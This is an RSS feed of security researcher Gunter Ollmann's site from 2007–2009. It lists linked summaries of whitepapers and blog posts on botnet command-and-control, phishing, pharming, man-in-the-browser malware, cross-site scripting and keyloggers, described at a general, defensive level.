http://www.technicalinfo.net Security thoughts and observations of Gunter Ollmann en-us Sun, 14 Jun 2009 21:00:00 EST http://blogs.law.harvard.edu/tech/rss Copyright 2009, Gunter Ollmann A clear distinction between a bot agent and a common piece of malware lies within a bot’s ability to communicate with a Command-and-Control (CnC) infrastructure. CnC allows a bot agent to receive new instructions and malicious capabilities, as dictated by a remote criminal entity. This compromised host then can be used as an unwilling participant in Internet crime as soon as it is linked into a botnet via that same CnC. The criminals actively controlling botnets must ensure that their CnC infrastructure is sufficiently robust to manage tens-of-thousands of globally scattered bot agents, as well as resist attempts to hijack or shutdown the botnet. Botnet operators have consequently developed a range of technologies and tactics to protect their CnC investment. This paper reviews the tactics commonly employed by botnet operators to maintain control of their botnets and the impact of these tactics on standard network-blocking protection stratagems. http://www.technicalinfo.net/papers/BotnetCommunicationTopologies.html Gunter Ollmann Sun, 14 Jun 2009 21:00:00 EST A common misperception of cyber-crime botnets is that a one-to-one relationship exists between a malware bot agent and an individual botnet. Even if this had been a true statement back when botnets first began to appear, it is not true today. The key is the development of commercial build-it-yourself malware kits. These professional-grade tools lower the entry-level requirements for creating a malware bot agent, constructing a Command-and-Control (CnC) structure, and controlling the resultant botnet. As a result, sophisticated botnets are well within the grasp of any technically-savvy user who knows how to use an Internet search engine and build a Web site. Enterprise organizations must change their focus from identifying malware by name to identifying the criminals behind individual botnets in order to keep up with this evolving threat. http://www.technicalinfo.net/papers/BotnetMalwareRelationship.html Gunter Ollmann Sun, 14 Jun 2009 21:00:00 EST Many of today’s more successful Internet-based fraud tactics require the counterfeiting of popular transactional Web sites such as financial portals, stock-trading platforms and online retail sites. For the fraud to be successful, the cyber-criminal must typically clone most, if not all, of the targeted site’s content and host the counterfeit site on a Web server under their control. With some minor modifications to the underlying HTML code and changes to the application logic, the cyber-criminal will seek to steal the personal authentication or authorization credentials of unlucky victims who fall to the counterfeit site. Armed with these credentials, the cyber-criminal will subsequently attempt to defraud the accounts of their victim. This whitepaper provides an overview of the techniques available to organizations that wish to undertake such identification activities – evaluating the pro’s and con’s of the various mechanisms and providing advice on how to employ this class of investigative technology. http://www.technicalinfo.net/papers/AntiFraudImageSolutions.html Gunter Ollmann Mon, 27 Apr 2009 21:00:00 EST Gunter's changed jobs and now has a personal security blog that gets updated regularly! http://www.technicalinfo.net/blog/security/20090411_BloggingAndDamballa.html Gunter Ollmann Sun, 11 Apr 2009 08:00:00 EST The problem facing online businesses going forward is, if upwards of one-third of their customers are likely to be using computers infected with malware to conduct business transactions with them, how should they continue to do business with an infected customer base? This new whitepaper discusses many of the best practices businesses can adopt for their Web application design and back-office support processes in order to minimize the growing threat of man-in-the-browser malware, along with helping to reduce several of the risks posed with continuing to do business customers likely to be operating infected computers... http://www.technicalinfo.net/blog/security/20081102_MalwareInfectedCustomers.html Gunter Ollmann Sun, 02 Nov 2008 20:45:00 EST Following several press interviews over the last couple of months, it was clear that many people don't quite grasp how the recent spate of SEO code injection attacks worked. Sure, they understand the concepts of the mass-defacements, but many people seem to think that it's the search engines fault. In reality, it has very little to do with the search engine itself, it's all about the way the "smart" applications have tried to optimize their page content so they can get better page ranks in the resultant searches of potential customers. This Search Engine Optimization (SEO) can be abused fairly easily. So, in order to help explain how the attack actually works, and propose some remediation/protection steps, I've created a new whitepaper on the subject - titled SEO Code Injection. http://www.technicalinfo.net/blog/security/20080831_SEOCodeInjection.html Gunter Ollmann Sat, 31 Aug 2008 16:00:01 EST Newly added 2008 archive of Frequency-X postings by Gunter. http://www.technicalinfo.net/blog/ISS/2008/index.html Gunter Ollmann Fri, 01 Aug 2008 01:00:01 EST Examination of vulnerable online Web browser populations and the "insecurity iceberg". With 623 million users vulnerable to bugs in teh Web browser, what does this mean going forward for Internet security? http://www.technicalinfo.net/papers/UnderstandingTheWebBrowserThreat.html Gunter Ollmann Tue, 01 JUL 2008 12:00:01 EST After some time away, I'm back to writing for SC Magazine. This months article covers the problems in patching the embedded systems used in the heath care organizations. http://www.technicalinfo.net/blog/security/20080423_HealthCarePatching.html Gunter Ollmann Wed, 23 APR 2008 19:10:00 EST According to X-Force, there has been a 5.4 percent year-on-year decrease in the annual disclosure of new vulnerabilities. Why? In this blog entry I examine the probable influences in the decrease - decreasing vulnerability appeal, vendor security testing improvements, professional bug-hunters and vulnerability purchase programs... http://www.technicalinfo.net/blog/security/20080210_2007VulnerabilityCounts.html Gunter Ollmann Sun, 10 Feb 2008 17:50:00 EST The Pharming Guide provides detailed analysis of the pharming threat. This second part covers in detail the attack vectors used to conduct the attack and the protection elements needed to secure against the threat. http://www.technicalinfo.net/papers/Pharming2.html Gunter Ollmann Sun, 27 Jan 2008 19:00:00 EST The Pharming Guide provides detailed analysis of the pharming threat. This first part covers the nature of the threat and a detailed analysis of how DNS actually works in the real world. http://www.technicalinfo.net/papers/Pharming.html Gunter Ollmann Sat, 26 Jan 2008 18:00:00 EST How can you automatically 0wn a Web site the next time the administrator logs in? Through the User-Agent field of your Web browser of course! A fabulous example of second-order cross-site scripting. http://www.technicalinfo.net/blog/security/20080121_UserAgentAttacks.html Gunter Ollmann Mon, 21 Jan 2008 19:55:00 EST The FAA document entitled “Special Conditions: Boeing Model 787-8 Airplane; Systems and Data Networks Security--Isolation or Protection From Unauthorized Passenger Domain Systems Access” raises the possibility of mile-high hacking a fly-by-wire, multi-million dollar, aircraft. http://www.technicalinfo.net/blog/security/20080107_HackingBoeing787.html Gunter Ollmann Mon, 7 Jan 2008 19:15:00 GMT There's been a little fuss over a recent posting concerning the threat of WHOIS cross-site scripting. To get your attention, it starts with “This is massive.” Now don’t get me wrong, there is a threat, but it is marginal – and I’ll explain why in a little bit. What’s all the fuss about? http://www.technicalinfo.net/blog/security/20080104_WhoisXSS.html Gunter Ollmann Fri, 4 Jan 2008 08:45:00 GMT "Barcode systems susceptible to serious hacker attacks" - so says Heise Security, in their article posted yesterday concerning FX's presentation at this weeks 24th Chaos Communication Congress. The article describes a few of the threats to systems that rely upon barcodes (on and two dimensional) - in particular their ease of manipulation for scamming purposes and the possibilities for code injection attacks. http://www.technicalinfo.net/blog/security/20080101_HackingBarcodes.html Gunter Ollmann Tue, 1 Jan 2008 17:47:00 GMT Commercial keyloggers are designed for use by corporate IT/Security/Audit teams and law enforcement agencies, and they're way more advanced than their malware cousins. http://www.technicalinfo.net/blog/security/20071230_CommercialKeylogger.html Gunter Ollmann Sun, 30 Dec 2007 18:00:00 GMT Whether it's deployed in hardware or software formats, for as long as people rely upon password protected authentication processes, the keylogger will continue to be a reliable hacking tool. http://www.technicalinfo.net/blog/security/20071222_HardwareKeyloggers.html Gunter Ollmann Sat, 22 Dec 2007 18:00:00 GMT In short (pun intended), females suggest that Australian boy racers are somewhat lacking in the trouser department. Apparently the campaign has been a roaring success and has helped reduce speeding down under. http://www.technicalinfo.net/blog/security/20071016_LittlePinkie.html Gunter Ollmann Tue, 16 Oct 2007 20:00:00 GMT Whenever I have to resort to using some kind of physical-world analogy to explain an Internet security principle, I can't but feel that I'm doing a disservice to the people listening. Depending upon the audiences involved, my analogies have ranged far and wide. http://www.technicalinfo.net/blog/security/20070921_SecurityAnalogies.html Gunter Ollmann Fri, 21 Sep 2007 20:00:00 GMT